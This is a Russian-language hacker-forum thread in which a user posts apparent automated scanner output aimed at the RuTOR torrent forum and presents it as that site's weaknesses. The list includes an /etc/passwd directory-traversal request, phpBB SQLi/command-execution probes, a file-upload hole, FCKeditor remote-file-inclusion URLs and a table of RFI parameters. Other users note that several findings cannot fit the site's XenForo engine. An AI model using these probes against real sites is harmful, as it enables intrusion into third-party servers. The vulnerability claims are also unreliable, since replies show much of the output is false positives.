Exploit Уязвимости на форум Rutor

  • Автор темы maniac666
  • Дата начала
  • Просмотров 1605 Просмотров

maniac666

Новорег
9
-3
10 Мар 2025
Автор
Kleopatra
Недавно я решил отсканировать полностью форум "RuTOR"
и вот какие интересы я нашел, снизу я более подробнее распишу"

Ну что всеми любимый сайт рутор, сегодня "Kleopatra" Пройдусь по вашим уязвимым местам )

хочу начать с первой уязвимости а именно

1. "SQL Injection / Command Execution через phpBB" (Это известная уязвимость phpBB, использовавшаяся червём Santy.A, позволяет выполнять команды или SQL-инъекции через параметр highlight.)

/viewtopic.php?t=...highlight=2527... Сообщения:

phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm

2. Directory Listing через ?PageServices=

а именно : /?PageServices= или же The remote server may allow directory listings through Web Publisher ( Это позволяет злоумышленнику просматривать список файлов на сервере, если каталог не защищён.)

3. Открытые файлы конфигурации и карты директорий (Конфиденциальная информация, может использоваться для разведки атакующим.)

/cfdocs.map — может раскрывать пути внутри ColdFusion-сервера.

/server-status — доступ к Apache Server Status.
This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access


4. /upload.cgi — уязвимость на загрузку файлов ( Может привести к полной компрометации сервера, если загрузить shell или скрипт. )

The upload.cgi allows attackers to upload arbitrary files to the server.

5. /cgi-bin/pfdisplay.cgi?.../../../../etc/passwd (Попытка чтения системных файлов UNIX/Linux (в частности /etc/passwd) — признак уязвимости "directory traversal")\

Comes with IRIX 6.2-6.4; allows to read arbitrary config

6. Утечки информации через старые плагины/веб-сервисы (Эти сервисы либо устарели, либо подвержены DoS-атакам, либо раскрывают чувствительные данные.)

/cpqlogin.htm — Compaq WBEM Server.

/na_admin/ — Default Network Appliance server.

/counter1/.../123.gif — The Roxen Counter.

7. Exair Search ASP — уязвимость к DoS (Скрипт search.asp в Exair-пакете на IIS может использоваться для атаки типа Denial of Service (DoS).)

Scripts within the Exair package on IIS 4 can be used for a DoS

Вывод:

| Категория | Уязвимость | Риск |
| ------------------- | ------------------------------- | -------------- |
| SQLi / Command Exec | phpBB `highlight` | Критический |
| Файловые уязвимости | `/etc/passwd`, `/server-status` | Критический |
| File Upload | `upload.cgi` | Критический |
| Directory listing | `/PageServices`, `/publisher` | Средний |
| Утечка информации | `cfdocs.map`, WBEM | Умеренный |
| DoS vectors | Roxen, Exair | Средний |


и это еще не все !


Уязвимый компонент:

Почти все эти уязвимости исходят из компонента:

swift
Копировать
Редактировать
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php

Это значит:

На сервере установлен устаревший FCKeditor

Параметры не фильтруются должным образом

Сервер принимает внешние URL как значения параметров, что опасно

Пример атаки:
bash
Копировать
Редактировать
.../connector.php?Dir=root=Для просмотра ссылки Войди или Зарегистрируйся
Этот URL — классический пример атаки RFI: подключение удалённого скрипта с сайта blog.cirt.net, который используется как тестовый для выявления RFI (из "RSnake's RFI list").

| Уязвимость | Компонент | Уровень риска |
| --------------------------- | ----------- | ------------------ |
| RFI (Remote File Inclusion) | `FCKeditor` | **Критический** |


и еще уязвимости :
Remote File Inclusion (RFI)

...?param=Для просмотра ссылки Войди или Зарегистрируйся

| Скрипт/Путь | Уязвимый параметр |
| ------------------------------------------------------------------- | ------------------------- |
| `prepare.php` | `xcart_dir` |
| `prepend.php` | `PX_config[manager_path]` |
| `preview.php` | `php_script_path` |
| `principal.php` | `conteudo` |
| `print.php` | `page`, `print` |
| `process.php` | `DEFAULT_SKIN` |
| `professeurs/index.php` | `repertoire_config` |
| `profil.php` | `config[root_ordre]` |
| `projects/weattimages/demo/index.php` | `in[langpack]` |
| `promcms/newspublish/include.php` | `path[bdocroot]` |
| `protection.php` | `logout_page` |
| `provider/auth.php` | `xcart_dir` |
| `psynch/nph-psa.exe` | `css` |
| `public_html/add-ons/modules/sysmanager/plugins/install.plugin.php` | `AURORA_MODULES_FOLDER` |
| `public_html/modules/Forums/favorites.php` | `nuke_bbroot_path` |
| `public_html/pub_blocks/activecontent.php` | `DragonRootPath` |
| `public_includes/pub_popup/popup_finduser.php` | `v` |


Найдены уязвимые параметры на rutor8.com, включая:

/template/Vert/index.php?pageAll=...

/editor/filemanager/browser/default/connectors/php/connector.php?Command=...

/templates/2blue/bodyTemplate.php?serverPath=...

/template/barrel/template.tpl.php?renderer=...

вот еще кое что интересное

.tools/phpMyAdmin/current/ – найдена директория phpMyAdmin — может дать доступ к БД.

/admin/install/phpinfo.php – файл phpinfo() раскрывает конфигурацию сервера.

/portal/binary/junk/, /portal/webservice/ – возможно, внутренние бинарные или SOAP-сервисы.

/console/login/LoginForm.jsp – форма входа Oracle WebLogic (уязвим к множеству CVE).

/servlet/snoopservlet, /servlet/hitcount – IBM Websphere демо-сервлеты (опасны, если активны).

/Admin/, /axis/services/, /imcws/services/ – Apache Axis / WebLogic endpoints.

Резервные/конфигурационные файлы:
web.config.bak, .orig, .swp и т.п. – backup’ы ASP-конфигов доступны извне, что критично.

/includes/connexion.inc – возможно, конфигурация подключения к БД.

/platform/, /jk-manager/html, /host-manager/html – Tomcat Web Manager доступен.

.svn/entries – содержит пути к директориям проекта (утечка структуры проекта).

Функциональность с потенциальным риском:
/getstatus – может возвращать системную информацию.

/wp-login.php?action=register – регистрация WordPress включена (можно злоупотребить).

/?s= – возможен LFI/RCE через параметр поиска.

/openadmin/ – интерфейс OpenAdmin (доступ к админке).
 
Источник
legion

maniac666

Новорег
9
-3
10 Мар 2025
я думаю вам понравиться, или должно понравиться ! я старался оформлял..
 
22
16
11 Дек 2022
Какой-то набор мало связанной и плохо структурированной информации.
Это какая-то очень тугая нейросеть собирала или же вы закопипастили тему времен палеолита?

/openadmin/ - Откуда это вообще, у них Xenforo стоит.
/wp-login.php - Тот же вопрос, обнаружить WP на форуме с Xenforo.
Каждая строчка этой темы бессмысленная.

Статья ради статьи, будет такая же следующая начну репу сливать Вам в минус за копирование мусора.
 
22
16
11 Дек 2022
я думаю вам понравиться, или должно понравиться ! я старался оформлял..

Ну это же полная хуйня, не связанная с реальностью. Оформления в теме тоже нет, но это ей не повредило.
Вы просто взяли мусор, из тематики в которой очевидно не разбираетесь, и принесли его на форум.
За это конечно вас не забанят, но я лично буду репутацию сливать за такой бред. Хотя бы разберитесь в том что пишете.
 

maniac666

Новорег
9
-3
10 Мар 2025
Ну это же полная хуйня, не связанная с реальностью. Оформления в теме тоже нет, но это ей не повредило.
Вы просто взяли мусор, из тематики в которой очевидно не разбираетесь, и принесли его на форум.
За это конечно вас не забанят, но я лично буду репутацию сливать за такой бред. Хотя бы разберитесь в том что пишете.
Смотри ты гений дохуя, почему если там все не так ты выявил только 2 ошибки?)
/openadmin/ - Откуда это вообще, у них Xenforo стоит.
/wp-login.php - Тот же вопрос, обнаружить WP на форуме с Xenforo.

Адекватный человек бы просто, написал что у тебя не правильно ничего, ты в свое время выявил две ошибки, окей пропустим, если ты знаешь что такое faketrash когда сервер пытается защититься от атаки какой либо или сканирования он начинает фейк мусор давать, спасибо я только что заметил, и да там половину правильных уязвимостей
 

maniac666

Новорег
9
-3
10 Мар 2025
мусор ставит -реакцию, малой скрыл посты ххаахха школьник который с префом на афк форуме сидит, харош минечик
 

n0_mad

Recon on Duty
57
8
14 Фев 2024
Смотри ты гений дохуя, почему если там все не так ты выявил только 2 ошибки?)
Почти правильно, но нет. Очевидно, что знаний у тебя особо нет, поэтому разъясню. Тебе @Krpt указывает не "ошибки", а спрашивает откуда в форуме, у которого совсем другой "движок" признаки того, что этому "движку" не соответствует. В данном случае, например: Откуда у Xenforo что-то вроде WordPress login page?
В общих чертах, как-то так. Глаза у меня сломались пока читал, какой-то намёк на годную информацию и оформление вот тут и закончился:
я решил отсканировать полностью форум "RuTOR"
и вот какие интересы я нашел, снизу я более подробнее распишу"

Ну что всеми любимый сайт рутор, сегодня "Kleopatra" Пройдусь по вашим уязвимым местам )